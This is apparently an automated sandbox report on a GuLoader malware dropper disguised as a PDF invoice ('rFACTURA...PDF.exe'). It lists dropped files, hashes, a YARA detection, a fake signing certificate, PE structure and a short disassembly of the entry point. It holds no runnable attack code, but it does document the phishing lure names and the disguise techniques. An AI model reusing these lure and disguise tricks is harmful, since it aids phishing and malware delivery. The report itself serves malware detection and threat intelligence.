                                                                                                File Type:ASCII text, with very long lines (22842), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):22842
                                                                                                Entropy (8bit):2.691165226704503
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:WHfXmxNkvIy6aQ+y57fZOKip2EuiP7Ecw8b:WHfWxNkvIy6axy57fAK82EuiP7Ecw8b
                                                                                                MD5:27DC252D9E7B26BA6BF2C6D437997658
                                                                                                SHA1:F81398F1F6FC24692BA8DF740CA2BF2AB73B27D6
                                                                                                SHA-256:530F4F75B62CB7E1B585671E4F184AC9C667FC4335CDA4120D27136E6F4F0100
                                                                                                SHA-512:473F5FED1BA3F62088A6ABE0D383EE9220DAABCB8524EFE8AC502B7503F4ACBA3DDAC69BBF1E046B5235C51129F2BF55F54C1D75285D7C5EE824C6DCA88D323D
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):32368
                                                                                                Entropy (8bit):6.393948275188786
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:yWweWqlXnYcLpSfX0lawccfNXLWrdzy+A2jc2EPLNtAf/uPHRN7AJ/AlGseC62c:EqlXYcgEAwcc17Wc+bj+PLHuMU/xjx2c
                                                                                                MD5:F2A123183E106BB1CF19376A8079D171
                                                                                                SHA1:2B96296BE92D5F2EF7C59A70858AF4CAABC99A9D
                                                                                                SHA-256:896D4ED138C35ECF19AE432380096562872EAB103F7E352C15D214FD875B337A
                                                                                                SHA-512:FCA6A89EFB16780A06CD25A55638882970F03E1535180A0E463AF9794184B04EB345CF29B12D4F261094E04A584E9225A7AD36A62631227451059F64A77B3C67
                                                                                                Malicious:false
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: rJUSTIFICANTEDEPAGO.exe, Detection: malicious, Browse
                                                                                                • Filename: rAEAT-AvisodeNotificaci__n.exe, Detection: malicious, Browse
                                                                                                • Filename: AEAT-Notificaci#U00f3n..rar, Detection: malicious, Browse
                                                                                                • Filename: PO-TO003256.exe, Detection: malicious, Browse
                                                                                                • Filename: PO-TO003256.exe, Detection: malicious, Browse
                                                                                                • Filename: SecuriteInfo.com.NSIS.InjectorX-gen.25087.6320.exe, Detection: malicious, Browse
                                                                                                • Filename: SecuriteInfo.com.NSIS.InjectorX-gen.12248.18354.exe, Detection: malicious, Browse
                                                                                                • Filename: SecuriteInfo.com.NSIS.InjectorX-gen.25087.6320.exe, Detection: malicious, Browse
                                                                                                • Filename: SecuriteInfo.com.NSIS.InjectorX-gen.12248.18354.exe, Detection: malicious, Browse
                                                                                                • Filename: DOC Shane inancial Holdings LLC Transaction Information 11.10.2022 .exe, Detection: malicious, Browse
                                                                                                • Filename: DOC Shane inancial Holdings LLC Transaction Information 11.10.2022 .exe, Detection: malicious, Browse
                                                                                                • Filename: PO-EP3141802303 -42804009_83276378283989393872376532893293009783763.exe, Detection: malicious, Browse
                                                                                                • Filename: DOC Shane inancial Holdings LLC Transaction Information 11.10.2022 .exe, Detection: malicious, Browse
                                                                                                • Filename: PO-EP3141802303 -42804009_83276378283989393872376532893293009783763.exe, Detection: malicious, Browse
                                                                                                Process:C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):14952
                                                                                                Entropy (8bit):6.599053939997928
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:mrlnC6xxk2R5Ws+Wql73WOL8/pCuPHnhWgN7aoWTF6lI+XqnajlkEv:6nbW2R5Ws+Wql7//uPHRN7SIImlqW
                                                                                                MD5:EDA04E04EBC0EBF7F8BBF30C4DAE6DE3
                                                                                                SHA1:7BC4D50E6EEC7F04A9272BFEE4E4DB6F278DBE63
                                                                                                SHA-256:F3E55CB3ADFA93F563B09114D93062E680AB0864C220491458FBE151798B862F
                                                                                                SHA-512:7027DA3404675596B71394B660E600DA12C0750895F624776362167869760555EE9990699FFC9E4407301FC9437B2F638E2734B8BDEF3C7054990FD5A9C86550
                                                                                                Malicious:false
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Process:C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):224632
                                                                                                Entropy (8bit):7.3469254146259635
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:WQyWMNv4aM4IqtUHXAxcNxBrQeb8hlosuRUVGiyKrFyPlWUUVkUiXPQW/NhrsPPR:IWEbtUAixGhlo2I+hyEUJXVFm0XQ
                                                                                                MD5:D2BE5DE19D44424CCB3F89510938FB53
                                                                                                SHA1:B98E5FD30E1DE7437187787AFE48AD516223E01F
                                                                                                SHA-256:0796783FC019D2AD4F01FF7AF14C24A9D3CFBAAB2BB9B44945231A46B6774D2B
                                                                                                SHA-512:6E54E8C97F5A10921DAD011AAD9FBBA1D4D622CF78F4C977A366EF6C7C49B35552A6100BFAFCC4464B34B351CC200AD9EE12406DDE37FC96C2614BD24A5D0553
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\antiphthisical\Primar\Cunicular\Densimetric\Talestrmmene.Unr, Author: Joe Security
                                                                                                Process:C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                Category:dropped
                                                                                                Size (bytes):6689
                                                                                                Entropy (8bit):5.135211840989561
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:VkjcMIy2+X2I2F2C2G2fH7y8cQaVB2nnuy1FQOcQaVv2q22L2k2s:mjcM7u8xaV8nnL1FQOxaVu6
                                                                                                MD5:C96D0DD361AFC6B812BDDD390B765A26
                                                                                                SHA1:71081F096719CAA70B9BAEF86FE642635D8E2765
                                                                                                SHA-256:6690799E5FA3FB0DD6CCE4BAC5AA1607C8A6BB16507854A87520C7DE53052E1B
                                                                                                SHA-512:7C73BC880A9401C64AB0571957B414180C1B94137C7BC870BA602979E7A990640A37991CB87A40BC7E5942A37FDA25EFC58C759C00F4344BA3D88B9AA64182DA
                                                                                                Malicious:false
                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg. xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:cc="http://creativecommons.org/ns#". xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#". xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". width="16". version="1.1". style="enable-background:new". id="svg7384". height="16.000036">. <metadata. id="metadata90">. <rdf:RDF>. <cc:Work. rdf:about="">. <dc:format>image/svg+xml</dc:format>. <dc:type. rdf:resource="http://purl.org/dc/dcmitype/StillImage" />. <dc:title>Gnome Symbolic Icons</dc:title>. <cc:license. rdf:resource="http://creativecommons.org/licenses/by-sa/4.0/" />. </cc:Work>. <cc:License. rdf:about="http://creativecommons.org/licenses/by-sa/4.0/">. <cc:permits. rdf:resource="http://creativecommons.org/ns#Reproduction" />. <cc:permits. rdf:resource="htt
                                                                                                Process:C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
                                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):227
                                                                                                Entropy (8bit):6.604776901672149
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:6v/lhPysE9Xj1F/bkqdXujFErL4MImATQZu22F+p:6v/7kR7/bjd8Kgm2Q/2y
                                                                                                MD5:7843C38CC42C6786B3373F166AF10172
                                                                                                SHA1:BA0163109D9B641B1312230B3F62E1E10A61AA5E
                                                                                                SHA-256:E3AF1293F8E8AB5C81300196AF55A7C15D5608291D46A2B86D4255910A7D0E59
                                                                                                SHA-512:B1D3DF6A0A8CACD729CD9A2FD5AB0F74ED611270FA172CDBEB13D46FA71DD5CC5540A2FBFDB6C3004E652D317C8FAD4EC3AE437DF1C082B629870A33CC6BD34F
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                Category:dropped
                                                                                                Size (bytes):1329
                                                                                                Entropy (8bit):4.950241534342892
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:t4Cp/YHyKbRAecFxVrGDT/Gfd8hTdyKbRAecFxVrGDT/bNxNxZrGQ:9YHNtAecFmDT/s8hdNtAecFmDT/j3YQ
                                                                                                MD5:021A9F00A28C9D496E490AE951E8EF12
                                                                                                SHA1:F8A6392065D07BAC72E138B0E47A24FFDCCEE74B
                                                                                                SHA-256:B420561770B77FCB47F69B6198B34B11155535F8A2E907BC4A0998CE74AFD340
                                                                                                SHA-512:7F4F2D904EA968BF68E35E0D7F1EAE9718234757D1989879996BFB49D9C447F67544CB0E1C441FD6539D58B5F2C6ACA7E9E0208738C235D9AF0C093511760212
                                                                                                Malicious:false
                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g fill="#474747"><path d="M1.018 7v2H14V7z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal;marker:none" color="#bebebe" font-weight="400" font-family="sans-serif" overflow="visible"/><path d="M11.99 4.99a1 1 0 00-.697 1.717L12.586 8l-1.293 1.293a1 1 0 101.414 1.414L15.414 8l-2.707-2.707a1 1 0 00-.717-.303z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decorati
                                                                                                Process:C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                Category:dropped
                                                                                                Size (bytes):1155
                                                                                                Entropy (8bit):5.154592341044034
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:t4CpQyhEXQDWu4AeWrGMyRQJaPahrGDfJcghSvOqlIQX6e4AeWrGMyp:vhjDWu4Ae3M5wSgDDontqe4Ae3MO
                                                                                                MD5:EFB3C780BC44B346B50B1F0DC6CF6D0F
                                                                                                SHA1:472B0EDD1C4C3092BC7C4DF934ABE126885B1780
                                                                                                SHA-256:990859D3B2C830E23EC276BF1D38A38EE1BA3D89BF04CB138107E4CDE31167B5
                                                                                                SHA-512:5B9C96F146C6A065C89172D02BDE8020876DC9C78859AD2B8B9529C615215F88BA85C2789544F5C5A247C148BB52FE4B5FCA325E7EAC4826D31A0365A0B8BCBE
                                                                                                Malicious:false
                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g fill="#474747"><path d="M5 7c-.31 0-.615.09-.812.281L.594 11l3.656 3.719c.198.19.44.281.75.281h1v-1c0-.257-.13-.529-.312-.719L4.406 12H9s1 0 1-1c0 0 0-1-1-1H4.375l1.219-1.281C5.776 8.529 6 8.257 6 8V7z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" color="#000" font-weight="400" font-family="Sans" overflow="visible" opacity=".35"/><path d="M11 11h1.375l1.125 1.094L14.594 11H16v1.469l-1.094 1.062L16 14.594V16h-1.438L13.5 14.937 12.437 16H11v-1.406l1.063-1.063L11 12.47z" style="marker:none" color="#bebebe" overflow="visible"/><path d="M11 9c.31 0 .615-.09.813-.281L15.406 5 11.75 1.281C11.552 1.091 11.31 1 11 1h-1v1c0 .257.13.529.313.719L11.593 4H7c-.528-.007-1 .472-1 1s.472 1.007 1 1h4.625l-1.219 1.281c-.182.19-.406.462-.406.719v1z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:star
                                                                                                Process:C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
                                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):891
                                                                                                Entropy (8bit):7.745720384539504
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:d4qWCHdkXfUZEcO5MkIi416cOQSkye9V+:d4qnHd8MkIi4Dpb6
                                                                                                MD5:5AF147D26AD399F83825377F04FD56A1
                                                                                                SHA1:B378A498B0DB8114C794E21D533E80CEBE5DDE04
                                                                                                SHA-256:6147A091847FCC9D9EDB22E655C4FC9DE6632C76D4252350400FA286F9791109
                                                                                                SHA-512:EEC16DE49A4698FE4F03F841FBCF045FBBDC9D634EB73ED35DB544B6DB4BC0135CD8E1DF102FD1E8BDE9FC75380948B4C0459685EE2C21858D645B7973759EA6
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
                                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):225
                                                                                                Entropy (8bit):6.596645802250635
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:6v/lhPysi5NuhsPwRngRfPq/3+phjSfVsup:6v/7thstJACSNsc
                                                                                                MD5:F894266AB6A933B2FDA751E6490C319A
                                                                                                SHA1:2D2D3635198FEEFCB64D1D6B3CDCCDC4EA3DF4B0
                                                                                                SHA-256:95F533585B4C61936C369557B3B7E397E56545A4C9DB9A5BDDD0E9ABB7A7F7E7
                                                                                                SHA-512:977ED04753C3CB2B883D03A2A55001F6FCC8617DC3060B6C25AB7E5C691C3F76049E7DEADC7F6567AB7E8DC8492DE2874E8E632CF3EAD7B39ABC8CC98D331442
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
                                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):263
                                                                                                Entropy (8bit):6.731374842054556
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:6v/lhPysw9TXm0RZC/8xhbPgfdSwj4vw29OjuAO4+ZvYNVp:6v/7QVXm0a/8xhbPgfdSBvNYn2ZvYd
                                                                                                MD5:003B524806C1CA654CAC6ED2EB883E1B
                                                                                                SHA1:F6F6ACA125DC4DB3B33378404017B5EE7D21D334
                                                                                                SHA-256:2899E53769FA741E2C0675A2C69D2C246A8F34601BEE58DD66B16261005962A9
                                                                                                SHA-512:AA905997F9CE39F039E33C4CCA167C0137775D91B4929D918528BA00B92737C448EC46D91A4221644CCC00D1FCAA403AFF83F07276BAB6FD80D4B9E88E652F87
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
                                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):337
                                                                                                Entropy (8bit):7.143668471552015
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:6v/lhPWFmX9Ckymx8BZhCjO5QO6MsHqd+K/eBDQeU2oG9xqgjp:6v/7K0omx8yOqVtHH1U2oGR
                                                                                                MD5:7FBFE5B0A7AD2A67AACFD8481F8DCA01
                                                                                                SHA1:21BABB6B7EC4746835DB43DC6A69A4AF0EFECA2D
                                                                                                SHA-256:0B4CD789E087F712F131FACCD754DC461774498DF3CA19B346D461D18A0AE622
                                                                                                SHA-512:3A8F0D9653301F789A0588E848C40FFC92394461BF70A3421ABC85647F2C115948134FE9E161D055A11D200536356A15677D9C0E645346D27E122001F67FE22B
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):6144
                                                                                                Entropy (8bit):4.496995234059773
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:1IUNaXnnXyEIPtXvZhr5RwiULuxDtJ1+wolpE:1Ix3XyEwXvZh1RwnLUDtf+I
                                                                                                MD5:E8B67A37FB41D54A7EDA453309D45D97
                                                                                                SHA1:96BE9BF7A988D9CEA06150D57CD1DE19F1FEC19E
                                                                                                SHA-256:2AD232BCCF4CA06CF13475AF87B510C5788AA790785FD50509BE483AFC0E0BCF
                                                                                                SHA-512:20EFFAE18EEBB2DF90D3186A281FA9233A97998F226F7ADEAD0784FBC787FEEE419973962F8369D8822C1BBCDFB6E7948D9CA6086C9CF90190C8AB3EC97F4C38
                                                                                                Malicious:false
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Process:C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):11776
                                                                                                Entropy (8bit):5.659384359264642
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                                                                                                MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                                                                                                SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                                                                                                SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                                                                                                SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                                                                                                Malicious:false
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                Category:dropped
                                                                                                Size (bytes):2097152
                                                                                                Entropy (8bit):4.51255552598015
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:fgvUY6/eee9WwB84iTd+vXlnFbSwv+JnxQ7SLj732JlCGzz4OragmcnYJe:fa9WwB84iTd+vXlnFGMB4OragmcnYJe
                                                                                                MD5:20E6A7C010975532E296EAFC1D773515
                                                                                                SHA1:8812E42B1E2D5A5F1F50B10199474541DC543E2F
                                                                                                SHA-256:A246C551735C3E61750F03DD6002D232027BB37C1358EF70C539A7B7238586AE
                                                                                                SHA-512:BA5C5C6C87421158407A0BBCE253F89E861A439BB6A7AE244CAB077CAEB1C67BFA90C2B2714D6161B0CADF1BB5DFAB9C455015759B390F2894F33AD9B8064B02
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                Category:dropped
                                                                                                Size (bytes):376832
                                                                                                Entropy (8bit):2.6699792372502262
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:MS3DFIecejetVNqlWjai5sTBG2qDgebeOeF8DgebeOeDe3TKeme:MYSJevPqc6ns8c6nie3TKz
                                                                                                MD5:0DB3DF965CE165E0BDB01BD97F87AB60
                                                                                                SHA1:F551D0441A56D23A34BF1D0F854DB1AFFA2E0B7A
                                                                                                SHA-256:EF041A829B69554F81F0EADAD45AB37647D3BD4D7FF365C485A37863B084DFB8
                                                                                                SHA-512:7A3682900253113666604F1F95B96AA421E06A7319B617106450BB5E2791FA0A9E78F3E5D23FC923A922BB0B6F75620A54A4230ACAAC199728FAF9E3EEE9511E
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                File Type:ASCII text, with CRLF, LF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):164
                                                                                                Entropy (8bit):4.5750027080925975
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:WNEDkFrA7fw3eqIusdHSdX7/fWmEdIOAlwV6EwqQLWFBaaafFa/Rv/naaaaqBcn:WsTbtyxkKO+dZWF7afFoRHRaaqBc
                                                                                                MD5:8D14AB4128F9BFE3E4F5F9B160BBFFE7
                                                                                                SHA1:7EA846DF04D4120A819DB47723C716BF2610E5CD
                                                                                                SHA-256:91D7EA682DB129FD33DA04168DB3BFCA08EA8B6CB0533C559E0ADC0DA5BD56E8
                                                                                                SHA-512:BF72FC0F59202B09E92961CE6C6CF21D3BBBB22AAA6B0A6B3FFBA2392362BF30A6B874A6CBBF6D11F06975CDDDBDB247053222D34D4F24055E50C0AFC9802E65
                                                                                                Malicious:false
                                                                                                Preview:.Unhandled Exception: System.Runtime.InteropServices.SEHException: External component has thrown an exception... at ????_.?;???.?????().. at ?????.?@???.Main().
                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                Entropy (8bit):7.02530526585537
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:rFACTURA_FAC_2023_1-1000733.PDF.exe
                                                                                                File size:431872
                                                                                                MD5:a6ef5ed777ba7369c2bb28e46b198ba6
                                                                                                SHA1:f707bc0343f41d95f57e776a9f85f6a2c5791aa7
                                                                                                SHA256:878d710875b07ec61bef0b198ba67bf81ad0730a3a483d5762cd18e13fb4b525
                                                                                                SHA512:3b0bbbf4199dfc669a75a8fb62cfa55423e2331358f43057219ee2a4099cc9c2b007d85b2cb1b6cd9c64d8d8421575690bed95556ca788cf13d6a53c96b3a2eb
                                                                                                SSDEEP:6144:B6bAcJvkzKmPPzS58G93IuZCBabjYBNwmlJ8kUEe/oqBaH0NxsvLg/nkrIak7r8m:a7ubCHICiwkBySs/vBGwxs0vh7rXN
                                                                                                TLSH:B194F161BFDBE857D02278B4A09ADE1E5E74EF14A249E307F3B139ACE5752513C1B202
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....uY.................d....:....
                                                                                                Icon Hash:20c4f8f8e8f0f24c
                                                                                                Entrypoint:0x403350
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x59759518 [Mon Jul 24 06:35:04 2017 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                                                Signature Valid:false
                                                                                                Signature Issuer:E=Giordano@Agencies.ano, OU="Desidiose Haarvkstens ", O=Percussion, L=Mccomb, S=Mississippi, C=US
                                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                Error Number:-2146762487
                                                                                                Not Before, Not After
                                                                                                • 09/01/2023 02:53:11 08/01/2026 02:53:11
                                                                                                Subject Chain
                                                                                                • E=Giordano@Agencies.ano, OU="Desidiose Haarvkstens ", O=Percussion, L=Mccomb, S=Mississippi, C=US
                                                                                                Version:3
                                                                                                Thumbprint MD5:B7600E9E947B9005922C17012BBF815F
                                                                                                Thumbprint SHA-1:F61732487D62043541218B18386BFA3513D9C7CF
                                                                                                Thumbprint SHA-256:C6510EBAF8763805CB5E0AAB32A94AEEFD9E39180B9A6D5F85E0272807031574
                                                                                                Serial:1B9B07C3A599FD0DBF3CF80F5B8149857D2F3BA7
                                                                                                Instruction
                                                                                                sub esp, 000002D4h
                                                                                                push ebx
                                                                                                push esi
                                                                                                push edi
                                                                                                push 00000020h
                                                                                                pop edi
                                                                                                xor ebx, ebx
                                                                                                push 00008001h
                                                                                                mov dword ptr [esp+14h], ebx
                                                                                                mov dword ptr [esp+10h], 0040A2E0h
                                                                                                mov dword ptr [esp+1Ch], ebx
                                                                                                call dword ptr [004080A8h]
                                                                                                call dword ptr [004080A4h]
                                                                                                and eax, BFFFFFFFh
                                                                                                cmp ax, 00000006h
                                                                                                mov dword ptr [007A8A2Ch], eax
                                                                                                je 00007F7B10C23313h
                                                                                                push ebx
                                                                                                call 00007F7B10C265A9h
                                                                                                cmp eax, ebx
                                                                                                je 00007F7B10C23309h
                                                                                                push 00000C00h
                                                                                                call eax
                                                                                                mov esi, 004082B0h
                                                                                                push esi
                                                                                                call 00007F7B10C26523h
                                                                                                push esi
                                                                                                call dword ptr [00408150h]
                                                                                                lea esi, dword ptr [esi+eax+01h]
                                                                                                cmp byte ptr [esi], 00000000h
                                                                                                jne 00007F7B10C232ECh
                                                                                                push 0000000Ah
                                                                                                call 00007F7B10C2657Ch
                                                                                                push 00000008h
                                                                                                call 00007F7B10C26575h
                                                                                                push 00000006h
                                                                                                mov dword ptr [007A8A24h], eax
                                                                                                call 00007F7B10C26569h
                                                                                                cmp eax, ebx
                                                                                                je 00007F7B10C23311h
                                                                                                push 0000001Eh
                                                                                                call eax
                                                                                                test eax, eax
                                                                                                je 00007F7B10C23309h
                                                                                                or byte ptr [007A8A2Fh], 00000040h
                                                                                                push ebp
                                                                                                call dword ptr [00408044h]
                                                                                                push ebx
                                                                                                call dword ptr [004082A0h]
                                                                                                mov dword ptr [007A8AF8h], eax
                                                                                                push ebx
                                                                                                lea eax, dword ptr [esp+34h]
                                                                                                push 000002B4h
                                                                                                push eax
                                                                                                push ebx
                                                                                                push 0079FEE0h
                                                                                                call dword ptr [00408188h]
                                                                                                push 0040A2C8h
                                                                                                Programming Language:
                                                                                                • [EXP] VC++ 6.0 SP5 build 8804
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x84fc           0xa0          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3d0000         0x28268       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x67500          0x2200        .data
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x2b0         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy            Characteristics
.text   0x1000           0x63c8        0x6400    False     0.6766015625        data       6.504099201068482  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8000           0x138e        0x1400    False     0.4509765625        data       5.146454805063938  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xa000           0x39eb38      0x600     unknown   unknown             unknown    unknown            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata  0x3a9000         0x27000       0x0       False     0                   empty      0.0                IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x3d0000         0x28268       0x28400   False     0.3355129076086957  data       4.767250735975199  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name           RVA       Size     Type                                                                 Language  Country
RT_ICON        0x3d0310  0x10828  Device independent bitmap graphic, 128 x 256 x 32, image size 65536  English   United States
RT_ICON        0x3e0b38  0x94a8   Device independent bitmap graphic, 96 x 192 x 32, image size 36864   English   United States
RT_ICON        0x3e9fe0  0x5488   Device independent bitmap graphic, 72 x 144 x 32, image size 20736   English   United States
RT_ICON        0x3ef468  0x4228   Device independent bitmap graphic, 64 x 128 x 32, image size 16384   English   United States
RT_ICON        0x3f3690  0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 9216     English   United States
RT_ICON        0x3f5c38  0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 4096     English   United States
RT_ICON        0x3f6ce0  0x988    Device independent bitmap graphic, 24 x 48 x 32, image size 2304     English   United States
